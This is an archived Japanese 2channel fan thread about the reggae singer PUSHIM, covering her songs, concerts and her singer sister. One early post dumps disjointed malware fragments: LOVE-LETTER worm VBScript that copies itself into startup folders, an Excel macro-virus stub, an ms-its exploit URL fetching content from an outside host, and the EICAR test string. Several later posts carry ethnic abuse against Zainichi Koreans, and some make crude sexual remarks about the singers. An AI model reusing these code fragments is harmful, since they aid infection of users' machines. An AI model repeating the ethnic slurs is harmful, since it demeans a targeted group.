2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

PUSHIM Part1

1 :名無しの歌姫:2006/08/05(土) 01:24:52 ID:16ONHlSN
なかったから立てた!!

2 :名無しの歌姫:2006/08/05(土) 07:17:06 ID:Fyx2vcMe
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

3 :名無しの歌姫:2006/08/05(土) 16:10:05 ID:kQOAbCtP
PUSHIM Strong woman

4 :名無しの歌姫:2006/08/05(土) 16:13:46 ID:gs37IP1D
I Play聴いてないた

5 :名無しの歌姫:2006/08/05(土) 17:28:06 ID:+vbeXYSk
ここに立てないでよ。
なんかやだなぁ。
J-POPの糞と一緒にされてるって。
HIP HOP板にはもうないわけ?

6 :名無しの歌姫:2006/08/06(日) 02:18:08 ID:sZa1uwne
5 名前: 名無しの歌姫 [sage] 投稿日: 2006/08/05(土) 17:28:06 ID:+vbeXYSk
ここに立てないでよ。
なんかやだなぁ。
J-POPの糞と一緒にされてるって。
HIP HOP板にはもうないわけ?

(笑)

7 :名無しの歌姫:2006/08/06(日) 02:21:19 ID:19XgtnX0
http://pastel.muvc.net/

ここでぱんちゅ売ってるゅらちゃん可愛い!

8 :名無しの歌姫:2006/08/06(日) 14:31:21 ID:XXPB5o8g
この前パクズグルーブで、ムーミンとかとライブしてたよ。

9 :名無しの歌姫:2006/08/06(日) 20:18:57 ID:l5SYVTye
>>1乙! 新譜も最高だー。やっぱり若いシンガーには出せない艶がある声してるね。個人的にはもうちょいメディアに露出して欲しいな。

10 :名無しの歌姫:2006/08/07(月) 13:02:06 ID:opvNehyN
この人何歳ですか?

11 :名無しの歌姫:2006/08/07(月) 17:04:44 ID:A6uablTD
妹は25才。妹の方が歌うまいし。かわいいし。

12 :名無しの歌姫:2006/08/07(月) 22:01:35 ID:aRcb/uq+
妹いるの?歌手?

13 :名無しの歌姫:2006/08/07(月) 22:05:09 ID:0LEqYDOY
とりあえずボンボクラ!

14 :名無しの歌姫:2006/08/07(月) 22:25:04 ID:A6uablTD
妹も歌手。

15 :名無しの歌姫:2006/08/07(月) 22:37:05 ID:8Q4RlXr4
>>5
ひぷほぷ板のは随分前に落ちた。向こうじゃ案外伸びなかったからここでもいい希ガス。

>>12
妹はヨンシンって歌手だよ。

16 :名無しの歌姫:2006/08/07(月) 23:36:41 ID:opvNehyN
I pray良かった!!

17 :名無しの歌姫:2006/08/07(月) 23:46:32 ID:aRcb/uq+
>>15
12です。教えてくれてありがとうございます。今度聞いてみますね^ ^

18 :名無しの歌姫:2006/08/08(火) 08:45:13 ID:h6ITlyhy
顔はヨンシンがいいけどやっぱ歌はPUSHIMがいいなあ

19 :名無しの歌姫:2006/08/08(火) 09:20:05 ID:ZnSLQH8a
体もヨンシンの方がいいよ。ちっさいし、巨乳やし。声もヨンシンのほうが綺麗。

20 :名無しの歌姫:2006/08/08(火) 11:39:51 ID:pXF9sLhR
I PRAYいいね。あのちょっとかすれた声がなんともいえん。
もっと名が売れてもいいと思うけどな…

21 :名無しの歌姫:2006/08/09(水) 11:39:56 ID:sVVwnWo7
アルバムは売れてるよね

22 :名無しの歌姫:2006/08/10(木) 14:44:59 ID:/RHGXy2k


23 :名無しの歌姫:2006/08/11(金) 00:29:12 ID:sr59Lrgv
何故かプシンを見るとやりたくなる。
ライブ中の顔とかエロイんだよねなんか、熟してきたし。

24 :名無しの歌姫:2006/08/11(金) 14:13:02 ID:d50gY6Ra
>>23
でもヨンシンのほうがかわいいよ。今は彼氏がいるけど。

25 :名無しの歌姫:2006/08/17(木) 14:43:31 ID:gK23Wzc4
プシンいい!

26 :名無しの歌姫:2006/08/18(金) 00:37:19 ID:/d5c8c8P
少し前MTVで見てから彼女について、気になってます。
名前の読み方が解りませんι
プッシンかプッシムかと思ってましたが、
プシンですか?

27 :名無しの歌姫:2006/08/18(金) 23:28:52 ID:8WRs4A0d
そう。パク プシンだよ。妹はパク ヨンシン。

28 :名無しの歌姫:2006/08/22(火) 01:25:37 ID:0ddoWHgi
やっぱプシンのスレは伸びないな。
リリースはだいたい年に一度だし叩く要素が少ないから2ch的なネタが少ないのか…w

29 :名無しの歌姫:2006/08/22(火) 10:28:26 ID:DdwaGfqV
今年もハイエストマウンテンに出るね。楽しみ。

30 :名無しの歌姫:2006/08/25(金) 16:50:29 ID:rM6FeDVP
てか、2ちゃんに張り付いてる奴がプシン知ってるわけないだろ。
I PRAYかなりいいね!!

31 :名無しの歌姫:2006/08/25(金) 19:09:43 ID:m9IPprCf
え?プシンって韓国の人なの?
一年前から聞いてます。いいよね。

32 :名無しの歌姫:2006/08/26(土) 14:25:12 ID:cnBvD5cW
こいつの歌や音楽の魅力がイマイチわからん。顔もブサいし。俺の彼女が大ファンなんだけどさぁ。

33 :名無しの歌姫:2006/08/27(日) 10:17:30 ID:D2k52ROU
プシンはレゲエクィーンだよ!!現場であの歌声聞いて感動して泣いてる女いっぱいいるよ。昨日のハイエストもプシンかなりやばかった。

34 :名無しの歌姫:2006/08/27(日) 15:19:36 ID:FVyvoLzZ
確かに何か伝わるものがあると思う。


35 :名無しの歌姫:2006/08/28(月) 18:32:33 ID:tdXKjzQj
最初にプシンを見た時、トミーズの雅がロン毛にしたのかと思った。

36 :名無しの歌姫:2006/08/30(水) 12:12:38 ID:ePZk0SzP
昔、プシンって大阪のどこのクラブで歌ってたの?

37 :名無しの歌姫:2006/08/30(水) 12:46:52 ID:Cc5+brVR
今でもパクズグルーブで歌ってるよ。

38 :名無しの歌姫:2006/08/31(木) 13:11:51 ID:rRtA/UZn
歌は顔じゃない・・・・・・・・。

39 :名無しの歌姫:2006/08/31(木) 15:28:14 ID:x4y4JPO0
プシンは一部のレゲエ好きしか知らないねぇ。全然売れてないし。

40 :名無しの歌姫:2006/08/31(木) 19:16:01 ID:Lp4XxQDY
プシンて韓国人なの!?初めて知った!
在日てことか…生まれてから?日本にいるの?
しかも妹までいるのか。
プシンの事いろいろ知りたい。

41 :名無しの歌姫:2006/09/06(水) 16:03:56 ID:/qsd/+Th
昨日、プシンのアルバム借りてきて聞いた。確かに歌声はセクシーだけど歌詞が何かイマイチかなぁ。

42 :名無しの歌姫:2006/09/06(水) 17:27:47 ID:c+Fm4fSC
妙なエロさがあるな。

43 :名無しの歌姫:2006/09/06(水) 21:41:55 ID:aaOl3d16
そうか?

44 :名無しの歌姫:2006/09/07(木) 21:31:46 ID:57i7Z/xe
周囲でプシン聞いてる人いる?私の周囲にはいない(泣)

45 :名無しの歌姫:2006/09/09(土) 03:58:29 ID:7GKtLGFJ
本名は富心

46 :名無しの歌姫:2006/09/09(土) 13:56:22 ID:Zas5H9JK
a

47 :名無しの歌姫:2006/09/09(土) 15:27:24 ID:L7jKUXRP
プシンは新大阪出身。

48 :名無しの歌姫:2006/09/12(火) 01:36:12 ID:ltDVYTQt
新大阪の学校?

49 :名無しの歌姫:2006/09/13(水) 12:41:57 ID:k6O0SBjn
プシンってレゲエシンガーのRYOと付き合ってたのは本当なの?

50 :名無しの歌姫:2006/09/13(水) 22:26:42 ID:L+GBPTUn
>>48
aikoと同級生

51 :名無しの歌姫:2006/09/14(木) 12:55:16 ID:IAwSzDEx
アルバム良いな
最後の曲好きだな
ブルドッグも好きだな
盛り上がるのこれ

52 :名無しの歌姫:2006/09/14(木) 22:00:19 ID:XntInWDH
プシンとaikoの共通点はブ○イク(笑)

53 :名無しの歌姫:2006/09/15(金) 08:48:23 ID:VYo4p7iD
めっちゃ可愛い
憧れる

54 :名無しの歌姫:2006/09/15(金) 23:08:12 ID:V/320wnp
>>52
おめーもブサイクとのってやった。

FRESH!!って名曲だな。

55 :名無しの歌姫:2006/09/17(日) 03:49:16 ID:uRLSmGjN
普通にブサ○ク

56 :名無しの歌姫:2006/09/17(日) 13:53:49 ID:wiiVK5Hh
プシンの曲に助けられたことが何度も何度もある
ああなりたい
ああいう女性になりたい
あ〜あまたライブ行きたいなぁ

57 :名無しの歌姫:2006/09/17(日) 16:09:57 ID:igQ/bxG8
PUSHIM今何才なの?

58 :名無しの歌姫:2006/09/18(月) 03:49:45 ID:+AA3S49j
確か1975年生まれだから31歳ぐらいかな?AIKOと違っておばちゃん臭プンプンするけどね。

59 :名無しの歌姫:2006/09/19(火) 12:56:27 ID:Jck1dwl1
>>58
この場合aikoのが特殊だろw

60 :名無しの歌姫:2006/09/19(火) 20:10:10 ID:Dx8LIM1o
プシンって売れないよね。なぜなんだろ?

61 :名無しの歌姫:2006/09/20(水) 10:25:09 ID:seiefHl/
毎日聴いてます
プシンに出会えて本当に良かった

62 :名無しの歌姫:2006/09/21(木) 09:47:26 ID:SaGJKdx9
歌声はセクシーだね。けど顔見て萎えた。

63 :名無しの歌姫:2006/09/23(土) 06:05:16 ID:ZATsQZGd
旧ソ連の伝説のGK?

64 :名無しの歌姫:2006/09/23(土) 13:12:28 ID:CbykYcTm
ルックスも歌声も曲も大好き
大好き
大好き
早く会いたい

65 :名無しの歌姫:2006/09/25(月) 06:49:43 ID:mYvCMCah
プシンって片桐はいりの妹じゃないよね?
友達が言ってたんだが・・・確かに顔が似すぎ

66 :名無しの歌姫:2006/09/27(水) 00:38:58 ID:DpdkdoKr
プシンに似てるAAみつけてきたよー^^

         , - ― -  、
       /::::::::::::::::::::::::::::::::`丶、
     /::::::::::::::::::::::::::::::::::::::::::::: ::ッV∧V∧V∧V∧V∧V∧V∧V、
     ,':::::::::::ィ、::::::::::::::::::::::::::::::::::≫ キャーッ           ≪
.    i:::::::::/__,、ゞハ;ノヽj;;::イ ┬'≫ のび太 さんのエッチ!! ≪
     !::::::,'  '''''''''     '''''''' ノ/ィ//〃//〃//〃//〃//〃//〃
    f⌒ij.. (●),   、(●) | )
    ゞ_ィ  `ー ,,ノ(、_, )ヽ、,,. ノ_'´      ,r'' ~''‐、
   _,.-::::人   `-=ニ=-.   ハ:: ``丶、 { . ..:. ::j ::::::::
 ∠'''- '´/`-、  `ニニ´. , ィ'   `ヽ'''  ::::::` 、_ ノ:::::::::::::::
:(⌒)::::: /      ` ー- ' ´        i::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::i                 l:::::::::::::::::::::::::::::::::(⌒):
::::::::::::::l   i    , -―- 、 l   l:::::::::::::::::::::::○::::::  :
:::::::::::::l   l  /       ) l   l::::::::::::::::::::::::::::::::::::::::::
::::::::::::l:,,,,,,,,..i/........./`''ー- '´.....l...........l:::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;;;;_;;;;;__;;;;;;;_;;;;;__;;;__:::::::::::::;;;;;;;;;_;;;;;__;;;;:(⌒):;;;;
                |:::::::::::r〜'´
___________ゞ;;;;;;;ノ_________
:..   |:..   |:..   |:..   |:..   |:..   |:..   |:..   |:..   |
_____|_____|_____|_____|_____|_____|_____|_____|_____|
:..   |:..   |:..   |:..   |:..   |:..   |:..   |:..   |:..   |
_____|_____|_____|_____|_____|_____|_____|_____|_____|


67 :名無しの歌姫:2006/09/29(金) 16:28:00 ID:PCTDLJTU
pushimて在日の方だったんだね・・・。
でも、心富む音の意味が分かって良かったよ。
良い歌も多いけどこれからも聞き続けるかは微妙。
ハマレゲとか去年みたいにクリスマスイベントに居れば聞くんだろうな

68 :名無しの歌姫:2006/09/29(金) 20:26:46 ID:9mNkB+73
今日はカラオケでプシン歌いまくってきました。すっきり

69 :名無しの歌姫:2006/10/02(月) 18:20:59 ID:FoxGzAdI
pushim大好き。辛い時悲しい時、その歌声にいつもいつも助けてもらいました。
11月に会いにいくよ

70 :名無しの歌姫:2006/10/02(月) 22:22:03 ID:C82qRNZJ
私も。
良いな。
私は来年だな。

71 :名無しの歌姫:2006/10/04(水) 21:00:25 ID:DBIZ4beF
プシンってNGと付き合ってたとかダボと付き合ってるって噂はあったけどどうなのかね。

72 :名無しの歌姫:2006/10/05(木) 12:38:36 ID:gMCg+TQ6
その手の話は全然わからないけど、イメージ的に長く付き合ってる彼がいそう。
プシンの書く歌詞はすごく可愛い。大好き。

73 :名無しの歌姫:2006/10/05(木) 13:39:46 ID:v+x+AwGM
歌は抜群に上手いな。ミンミの1000倍は上手い。

74 :名無しの歌姫:2006/10/05(木) 15:49:56 ID:gMCg+TQ6
プシンは曲によって歌い方が違うというかどれもめちゃめちゃ心込めてんなぁといつも思う。
しっとり系では泣かせてくれるしもちろんアップテンポは得意中の得意だよねぇ。


75 :名無しの歌姫:2006/10/09(月) 01:41:03 ID:LwGb2kQk
ライムスターとかいろいろ一緒にやってる曲ちらっと聞いたけどよさげ

76 :名無しの歌姫:2006/10/10(火) 00:11:18 ID:nOKDxjmF
前のだけどリョウザ君とうたうなんとかディスタンスが好き
歌詞も好き

77 :名無しの歌姫:2006/10/11(水) 15:32:30 ID:1I7PWhdG
プシン大好き!
CDよりライブの方が絶対良い!心込めて歌ってるから、凄く伝わってくるし鳥肌モノ!!
11月のライブ楽しみ〜

78 :名無しの歌姫:2006/10/11(水) 21:36:40 ID:fWVw6uaf
どこで??
いいなあ・・・

79 :名無しの歌姫:2006/10/12(木) 14:57:26 ID:aSsR0xMW
PUSHIM好きだけど、いい曲とイマイチな曲の差が激しい気がする。
顔はブサイクだけど歌のウマサでカバーしてるから知ってる奴は知ってる。
テレビには出て欲しくないなぁ。。。
謎な女的な所も好きだから。

80 :名無しの歌姫:2006/10/12(木) 16:02:06 ID:I/oXmTOG
俺はめちゃめちゃタイプだけど。生で会うとわかる

81 :名無しの歌姫:2006/10/12(木) 21:37:39 ID:Qfv2zq+M
ヨンシンの方が歌上手い。てかこの姉妹、歌うま過ぎ! 幸田姉妹なんかと比較にならないな。

82 :名無しの歌姫:2006/10/13(金) 23:56:24 ID:QmmrcUHl
ぷしんに会いたい
o(T□T)o

83 :名無しの歌姫:2006/10/14(土) 20:21:44 ID:sw+bce/W
私は新潟フェイズでやるツアーに初参戦♪
どんな服で姉さんに会うか考え中。。。

84 :名無しの歌姫:2006/10/14(土) 20:27:26 ID:sw+bce/W
さよなら かなしいできごと
さよなら 涙も まるごと

85 :名無しの歌姫:2006/10/15(日) 21:27:04 ID:DjnIN77a
富む心と書いてプシン

86 :名無しの歌姫:2006/10/15(日) 23:29:10 ID:yBiyCEOH
強い風がふけば立ち向かい
激しい雨の音歌になり
雲が去りもう聞こえぬ落雷
オウライオウライ
往来好き

87 :名無しの歌姫:2006/10/16(月) 10:43:18 ID:NdaGlil6
なぜ北朝鮮も韓国も在日朝鮮人を返せと言わないの?

88 :名無しの歌姫:2006/10/16(月) 14:01:13 ID:vs3/jPiB
>>87
ニュー速あたりで聞いてこい

89 :名無しの歌姫:2006/10/21(土) 07:54:56 ID:b9fcvfeo
>>78
遅レス スマソ
@福岡です。もうすぐ会える〜。
最近バイクに乗ってる男の人が大音量で毎日PUSHIMかけてるのに出くわすw

90 :名無しの歌姫:2006/10/21(土) 15:44:24 ID:WSuyDm4M
いいなあ…
ぷしんに会いたいo(T△T)o

91 :名無しの歌姫:2006/10/21(土) 15:46:18 ID:WSuyDm4M
ぷしんのブログて無いのかな…

92 :名無しの歌姫:2006/10/21(土) 22:03:33 ID:igeSVCYN
レポよろしく。期待してます。

93 :名無しの歌姫:2006/10/21(土) 23:22:15 ID:tfX7SRw0
佐賀

94 :名無しの歌姫:2006/10/22(日) 08:06:53 ID:FZnTe7oH
ぷしんを知って以来憧れて黒髪にしています。

95 :名無しの歌姫:2006/10/22(日) 22:27:59 ID:rWhi+W5a
【週刊文春】 2005年 4月21日号

  (P.26〜)
■ 新聞・TVが絶対報じない
  日本人信者 処女30人を凌辱した 在日韓国人レイプ牧師 パウロ永田の正体

  (P.28)
> 「被害者の会」の佐賀千惠美弁護士は、
> 「被害者の中には、初潮を迎えていない少女もいました。 姦淫されても、小学生だったから
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~                ~~~~~~~
> 彼女らには抵抗できなかった。 ある少女か 『恥ずかしいです』とささやかな抵抗をしても、
> 金容疑者は、『神は、幼子の心を忘れてはならないと説いている』と答えました」


96 :名無しの歌姫:2006/10/23(月) 16:20:41 ID:7TP4U1Wq
ぷしんは身長どのくらいだろう?

97 :名無しの歌姫:2006/10/24(火) 01:24:12 ID:pkGv0Osm
金曜のイベントのチケットあるのに一緒に行く人がいない(´・ω・`)

98 :名無しの歌姫:2006/10/24(火) 03:11:21 ID:l0jQ40+A
あいせ〜いいぇ〜♪

99 :名無しの歌姫:2006/10/24(火) 20:02:29 ID:HhR2kpbT
pushimのPV集が出るってウワサホント?

100 :名無しの歌姫:2006/10/24(火) 20:10:20 ID:/Z2wZ+3w
>>97
行きたい!どこ?

101 :97:2006/10/24(火) 23:41:56 ID:pkGv0Osm
>>100
Shibuya-AX
ライムスターとかホームメイドとかでるやつなんだけど。


102 :名無しの歌姫:2006/10/25(水) 09:00:52 ID:V9UC1j4h
東京、、、
行きたいけど行けない…羨ましい〜楽しんできて!ひとりでも行った方良いよ
レポ楽しみにしてます!

103 :名無しの歌姫:2006/10/25(水) 09:03:43 ID:zysBiUU3
b

104 :名無しの歌姫:2006/10/25(水) 19:31:21 ID:DD8vXPv3
>>102
そうですか…。
でも一人はちょっと怖いからどうしようか悩むなー。
誰か行ける人いませんか?

個人的なことでスミマセン。

105 :名無しの歌姫:2006/10/26(木) 10:23:43 ID:4ZOeg75g
( ´゜э゜`)いいなぁ

106 :名無しの歌姫:2006/10/26(木) 20:04:23 ID:JU/1Wm/F
3階窓から逆さづり、女性落とされ重体…内縁の男逮捕

26日午前1時30分ごろ、大阪市生野区生野東のマンション3階の女性(36)方で、
内縁関係にあった同区勝山北5、自営業徐泰俊容疑者(46)が女性の脚を持って
窓(高さ約6メートル)から逆さづりにし、隣接する集会所の敷地のコンクリート上に落とした。
女性は頭の骨を折るなどして重体。
生野署員が病院に付き添っていた徐容疑者に事情を聴いたところ、容疑を認めたため、殺人未遂容疑で逮捕した。
調べでは、2人は別居しているが、徐容疑者は25日深夜、酒に酔って女性宅を訪問、
子供の養育を巡って口論になったといい、調べに対し「カッとなって脅そうとしたが、
実際に落とすつもりはなかった」と供述しているという。
(2006年8月26日14時59分 読売新聞)
ttp://www.yomiuri.co.jp/national/news/20060826i406.htm


107 :名無しの歌姫:2006/10/30(月) 00:35:03 ID:vCa1kJLy
ぷしん、お願いがあります。また、近いうち岩手に来てください。
大好きです。

108 :名無しの歌姫:2006/10/30(月) 01:16:04 ID:zV0SC7PW
>>107
だったらお前も整形してこい!

109 :名無しの歌姫:2006/10/30(月) 21:49:08 ID:vCa1kJLy
ぷしん、かわいー!!って叫んだらニコッてしたんだよ。めちゃくちゃ可愛い。嬉しい!

110 :名無しの歌姫:2006/11/01(水) 10:04:18 ID:fHmSAfqv
恩をあだで返す朝鮮民族は最低のクズ民族

111 :名無しの歌姫:2006/11/01(水) 20:31:53 ID:CmJa7hdN
ツアー行った人レポートよろしく
4日は仙台だな

112 :名無しの歌姫:2006/11/03(金) 13:14:20 ID:mDDvD5d+
是非祖国へ帰ってくれ

113 :名無しの歌姫:2006/11/04(土) 01:14:09 ID:9J8hp0G7
ラジャb

114 :名無しの歌姫:2006/11/04(土) 07:54:07 ID:Ui2k1Ecu
スタッカートスタッカート

115 :火を灯せ ◆l4pFL5xe7Q :2006/11/04(土) 09:16:23 ID:CXgZIKqv
PUSHIM生で見た(・∀・)
よくレゲエのイベいくからPUSHIM見かけるよ〜。
I play歌ってた(★´V`)

116 :名無しの歌姫:2006/11/04(土) 12:30:17 ID:7mT0T2sC
パソコンに張り付いて一日中、韓国や韓国人のアラ探ししてる人がこのスレには多いようだが
インターネット上でしか他人と関われない様な人間には僕はなりたくない。
オークランドに住んでいた時、ルームシェアしていた韓国人の女性と仲良くなり
ツーリングに行ったり一緒に学校の宿題をしたりして過ごした。
かなり気の強い子だったが、それでも彼女から不当な日本についての罵声をあびたことなど
いちどもなかった。もちろん僕達がまだ若く無知だったからかもしれない。
でも彼女や彼女の友達の韓国人から酷い扱いを受けた事は
1度も無かったのだ。ここにいる差別主義の日本人達より僕はずっと彼女達が好きだ。


117 :名無しの歌姫:2006/11/04(土) 17:57:56 ID:Ui09SfaX
>>116
でかいか?ミンミと間違えてない?

118 :名無しの歌姫:2006/11/04(土) 20:36:51 ID:Zajbkk1m
プシンは富心って書くよ。

119 :名無しの歌姫:2006/11/04(土) 22:26:08 ID:Ui2k1Ecu
ぷしんに会いたい
o(T◇T)o

120 :名無しの歌姫:2006/11/04(土) 23:28:57 ID:MGaua7dG
かっこかわいかった。関西弁にギャップ。生はやっぱ違うよ。

121 :名無しの歌姫:2006/11/05(日) 17:55:56 ID:2VWXBJRY
昨日仙台いってきました。ゲストはブギーマンきてた。しかし前座がイマイチだったなぁ…orz

122 :名無しの歌姫:2006/11/05(日) 18:06:05 ID:PQltTAjv
パク・プシン

123 :名無しの歌姫:2006/11/06(月) 10:57:29 ID:9UtW4Dan
ぷしん大好きo(T□T)o

124 :名無しの歌姫:2006/11/07(火) 23:27:35 ID:BpAXjW+9
パク・ヨンシン

125 :名無しの歌姫:2006/11/09(木) 00:46:29 ID:zHh2NaSl
PAPA Bと一緒にやってるミステリアスって曲が好き

126 :名無しの歌姫:2006/11/10(金) 20:15:22 ID:h+X94zmh
生プシン、すっごいかわいかった★

127 :名無しの歌姫:2006/11/10(金) 20:58:41 ID:8+Nx2dux
日曜の広島、メチャメチャ行きたいのにソールドアウト。
誰かチケット二枚余ってる人いれば売って欲しいです。(広島人より)

128 :名無しの歌姫:2006/11/11(土) 08:06:01 ID:AD2M1S7L
ほんっっとに生プシン良かった〜。感動した。
編集してるはずのCDより生歌の方が良いってなかなか無いと思うんだけど、プシンに関しては絶対生で聞いて欲しい。生で聞く度感動します。もう大好き!

129 :名無しの歌姫:2006/11/11(土) 18:32:39 ID:xDFv+Z5N
韓国人って不細工な自国の選手をフォローしないな。
スポーツ選手だから、基本は見た目でなく実力だろうに、見た目が悪
いと、実力ある選手を誹謗されてもスルー。
逆の立場ならと思った。見た目が良いにこしたことは無いけど
見た目だけの実力なし選手だったら、日本人は辛らつと思うが。
スポーツ選手って芸能人でもタレントでもないし、勝負に勝って
ナンボだろうに。不細工でも勝てば賞賛な日本。勝っても不細工
だと自慢しない韓国。見た目重視って自覚してないだけ、韓国の
未来は暗い。中身を見ろと言いたいが、中身を見れる民族だった
ら日本の経済支配でホルホルしてないよな。
自意識過剰で卑屈なくせに傲慢で、ガキみたいな民族だな。。。


130 :名無しの歌姫:2006/11/11(土) 23:31:44 ID:0HqetsKK
アイライクユアスマイル
アイライクユアボイス
アイライクユアハンズ
アイライクユアアイズ
ンー
ユーアーマイシャイニングスター
ユーアーマイオンリーワン
ザオンリーワン
ユーアーマイエブリセィ〜ング

131 :名無しの歌姫:2006/11/16(木) 21:50:48 ID:vW898cOa
小さな心で
また一歩踏み出して
歩いてゆく

132 :MINA:2006/11/18(土) 09:27:09 ID:Izyjo6Ld
11月14日ZEPP名古屋のライブ行ってきました。
さすが!!
素晴らしい歌声聞かせてもらいました。


133 :名無しの歌姫:2006/11/18(土) 11:12:34 ID:4oXa1U28
プシン待ち受けにしたいんだけど、素敵な画像ありませんか?

134 :名無しの歌姫:2006/11/18(土) 11:19:55 ID:b9bttXHz
教えてちゃんですが、9月に発売されたNewAlbumの名前を教えていただけませんか?

よろしくお願いします!

135 :名無しの歌姫:2006/11/18(土) 15:30:57 ID:oqT6wCIh
>>134
Sing A Song...Lighter!

136 :名無しの歌姫:2006/11/18(土) 16:29:23 ID:b9bttXHz
ありがとうございました

早速買いに行ってきます
好きな人が大好きなアーティストなんで・・・

親切にありがとう

137 :チャイナ:2006/11/27(月) 00:37:36 ID:WaCNvS4/
横浜ブリッツいてきたー最高噬|ッポー嚔。浜がツアーのラストだったんだね氓オかもプシンの誕生日だった、ブギマンとボイケンがゲストで来ててポーッ嚶ナ後はムーミンとチョーゼンリーがゥポッポーッ

138 :名無しの歌姫:2006/11/27(月) 12:42:23 ID:+TAVnQXT
朝鮮総連の国会前デモに便宜を図ったとされる、民主党近藤昭一議員に電話しました
ttp://bl●●og.livedoor.jp/mumur/archives/50686205.html

●●を抜いてね

139 :名無しの歌姫:2006/11/28(火) 20:52:59 ID:YkU5+S2f
CHOZEN LEE?

もしやSoulful Dance歌った?

140 :チャイナ:2006/12/02(土) 11:56:27 ID:KDZdpQkf
ちょと歌ってたけど何歌ってたかわかんねい

141 :名無しの歌姫:2006/12/07(木) 17:39:39 ID:ca/o0J3O
誰かZEPP TOKYOのライヴ見に行った方いらっしゃいませんか??

142 :名無しの歌姫:2006/12/07(木) 23:08:43 ID:j32q8CFA
>>141
行ったよー

143 :名無しの歌姫:2006/12/13(水) 15:40:13 ID:urZwzf7N
I SAY YEAH

144 :名無しの歌姫:2006/12/13(水) 21:48:33 ID:Fp0r9eJB
I Pray 最高 生で聞きたい

145 :名無しの歌姫:2006/12/15(金) 16:02:29 ID:y4+GqlBo
Heavenly生できいてみたい

146 :名無しの歌姫:2006/12/17(日) 14:19:52 ID:y/52Pn9E
以下生でヤりたい禁止

147 :名無しの歌姫:2006/12/22(金) 08:44:11 ID:PStfTMwM
pushim大好き。I Pray ナマデ聴いて泣いた。

148 :名無しの歌姫:2006/12/29(金) 21:25:37 ID:+C1hKmip
I say yeahとかプシンに皆喰われてるよね
飛び抜けて魅力ある声
dancehall checkerなんかsuger soul可哀想なくらい
ン年前にasiaでzeebraがHHでは有名な外人呼んだ時もプシンゲストで
歌ってその外人はプシン下手褒めしてたな
zeebra立場ナシだった

しかし本物の歌姫はメディアに出ないもんだな

149 :名無しの歌姫:2006/12/30(土) 00:48:22 ID:/izleJFE
?

150 :名無しの歌姫:2007/01/01(月) 04:22:29 ID:dJxHy8CC
女子ゴルフ、滝浪愛がスコア改ざん…QTの初日に発覚

 女子プロゴルファーの滝浪愛(26)が、10月に行われた日本女子プロゴルフ協会(LPGA)主催のトーナメントでスコアを
改ざんしていたことが27日、明らかになり、LPGAは28日に臨時理事会を開き、事実関係の確認、処分などを決めることになった。

 改ざんがあったとされるのは今年10月31日から茨城県のノースショアCCで開かれたセカンド・クオリファイング・トーナメント(QT)。
初日、マーカーが確認のサインをした後、スコアを少なく直した点を指摘され失格となった。LPGAは故意によるものかなど、調査していた。

 QTはツアー出場権をかけた予選会で、1、2、3次とふるい分けされ、最終予選会で30位前後に入ると、翌年のほぼ全試合に出場できる。

 滝浪は2001年にプロテストに合格。9月のミヤギテレビ杯ダンロップ女子オープンで24位タイに入るなど、
今季の獲得賞金は190万円余でツアー111位。

 プロゴルファーのスコア改ざんについては、男子の中西雅樹(22)が8月の日本オープン最終予選初日にスコアを少なく書き直したとして、
日本ゴルフツアー機構から5年間の出場停止処分を受けたばかり。

 滝浪が所属する事務所は「事実を確認できないのでコメントできない」と話している。

(2006年12月27日11時45分 読売新聞)
ttp://www.yomiuri.co.jp/sports/etc/news/20061227i504.htm?from=main5

ttp://www.lpga.or.jp/profile/profile.asp?yyyy=2006&cd=643
>出身校 東京朝鮮中高級学校

151 :名無しの歌姫:2007/01/05(金) 13:11:08 ID:Su2Nc83t
PUSHIM ストロングウーマン

152 :名無しの歌姫:2007/01/06(土) 03:01:57 ID:mNW1cV6C
某音楽スタジオで受付の仕事してるからPUSHIMはよく来るんだけど、
姉さんほんと素敵で最高!! この前、メモ用紙に似顔絵描いてもらって(笑)
ハンパなく上手だった。まさにアーティストです(>∀<)

153 :名無しの歌姫:2007/01/13(土) 18:49:53 ID:X1ua5u/c
PUSHIMに会いたい会いたいすごい素敵な人だった。好きすぎて泣けた

154 :名無しの歌姫:2007/01/26(金) 00:25:26 ID:cRYIqmhj
ほしゅ

155 :名無しの歌姫:2007/02/04(日) 07:47:39 ID:tYShBXsC
PUSHIM最高だにゃ〜!!!

156 :名無しの歌姫:2007/02/10(土) 08:54:15 ID:pgdofqWz
でもムーミンに処女を奪われた

157 :名無しの歌姫:2007/02/15(木) 10:49:45 ID:yq+xdBHH
今年こそ生で観たい。プシンもっと売れても良くね?

